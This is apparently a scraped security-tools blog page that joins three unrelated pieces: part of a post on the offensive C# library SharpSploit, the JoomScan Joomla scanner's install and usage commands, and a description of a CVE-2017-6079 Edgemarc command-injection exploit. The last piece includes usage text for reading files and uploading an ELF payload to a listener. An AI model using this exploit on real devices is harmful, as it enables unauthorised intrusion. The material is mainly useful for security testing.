However, C# does not come without it’s own set of issues from an offensive perspective. It certainly seems as if optics into .NET are on the way, and from an operator usability perspective we lose quite a bit of flexibility moving from a scripting language like PowerShell to a compiled language like C#.

We also need to start worrying about .NET versions. You’ll find .NET v3.5 on a majority of Windows OS versions by default, but newer Windows 10 and Server 2016 systems will only have .NET v4.0+ installed by default. Another “gotcha” is that .NET is not enabled by default on all Windows OS versions either, you’ll find that it needs to be explicitly enabled on Windows Server 2008 and earlier server OS versions. SharpSploit attempts to deal with this by targeting .NET v3.5 and v4.0 to get the most coverage possible, but you’ll need to be careful to use the correct version on the correct system.

SharpSploit Console or Not to Console?

The most significant difference you will see between SharpSploit and most other offensive C# libraries that have been released so far, is that there is no SharpSploit.exe! SharpSploit is designed as a library, so there is only a SharpSploit.dll.

My intention is for SharpSploit to be primarily used as a library for operators to reference in their own toolsets. However, I anticipate some limitations from this implementation that will likely force me to add a console-based interface eventually. For instance, Cobalt Strike’s execute-assembly module expects an application to have an EntryPoint (i.e. “main” function) to execute, so SharpSploit currently does not operate easily with Cobalt Strike. This is a great example of some of the flexibility issues with offensive C# we will have to solve in the transition from PowerShell.

Try not to worry about this too much for now, you’ll see some other creative methods for SharpSploit execution from me here in the near future 🙂 And I will likely add a follow-up post at some point on convenient methods for executing SharpSploit functions.

Joomscan – OWASP Joomla Vulnerability Scanner Project

OWASP Joomla! Vulnerability Scanner  or JoomScan is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.

Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system.

Furthermore, it provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads. It is included in Kali Linux distributions.

Also ReadHow Safe is to Use the Internet From Public WiFi?

Installation

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl

ARGUMENTS

Usage:	joomscan.pl [options]

--url | -u <URL>                |   The Joomla URL/domain to scan.
--enumerate-components | -ec    |   Try to enumerate components.

--cookie <String>               |   Set cookie.
--user-agent | -a <user-agent>  |   Use the specified User-Agent.
--random-agent | -r             |   Use a random User-Agent.
--timeout <time-out>            |   set timeout.
--about                         |   About Author
--update                        |   Update to the latest version.
--help | -h                     |   This help screen.
--version                       |   Output the current version and exit.

JOOMSCAN USAGE EXAMPLES

Do default checks…
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com

Enumerate installed components…
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec

Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"

Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
perl joomscan.pl -u www.example.com -a "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

Set random user-agent
perl joomscan.pl -u www.example.com --random-agent
or
perl joomscan.pl --url www.example.com -r

Set proxy
perl joomscan.pl --url www.example.com --proxy http://127.0.0.1:8080
or
perl joomscan.pl -u www.example.com --proxy https://127.0.0.1:443

Update Joomscan…
perl joomscan.pl --update

Video

Exploit CVE-2017-6079 – Blind Command Injection In Edgewater Edgemarc Devices Exploit

This exploit was developed based on the technical description by depthsecurity

https://depthsecurity.com/blog/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices

The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows for user-defined commands such as specific iptables routes, etc., to be set. You can use this page as a web shell essentially to execute commands, though you get no feedback client-side from the web application: if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006.

Also ReadVboxdie Cracker – Virtual Box Disk Image Encryption Password Cracker

Nmap will identify the device from its web server as shown

Usage

 _____    _                          _
| ____|__| | __ _  _____      ____ _| |_ ___ _ __
|  _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__|
| |__| (_| | (_| |  __/\ V  V / (_| | ||  __/ |
|_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_|
            |___/
 _____    _
| ____|__| | __ _  ___ _ __ ___   __ _ _ __ ___
|  _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __|
| |__| (_| | (_| |  __/ | | | | | (_| | | | (__
|_____\__,_|\__, |\___|_| |_| |_|\__,_|_|  \___|
            |___/
 _____            _       _ _
| ____|_  ___ __ | | ___ (_) |_
|  _| \ \/ / '_ \| |/ _ \| | __|
| |___ >  <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
           |_|


                 Edgewater Edgemarc Exploit CVE-2017-6079
                 Coded By: Mostafa Soliman
                 
    [USAGE] CVE-2017-6079.py [operation] [TargetIP] [AttackerIP] [FilePath]
    operation: Either read / upload
    AttackerIP: IP address to receive the connection on
    TargetIP: IP address of the target running Edgewater Edgemarc server
    FilePath:  Remote file to download in case of "read" operation
               Local file to upload in case of "upload" operation

Exploit

The exploit assumes that the device has default root password which is default if this is not the case you will need to replace the Authorization The exploit has 2 modes of operation:

Read

This mode allow the attacker to read any files on the vulnerable device.

Upload

This mode allow the attacker to upload ELF file payload to /tmp/ folder and execute it. You will need to start listner to recieve the connection.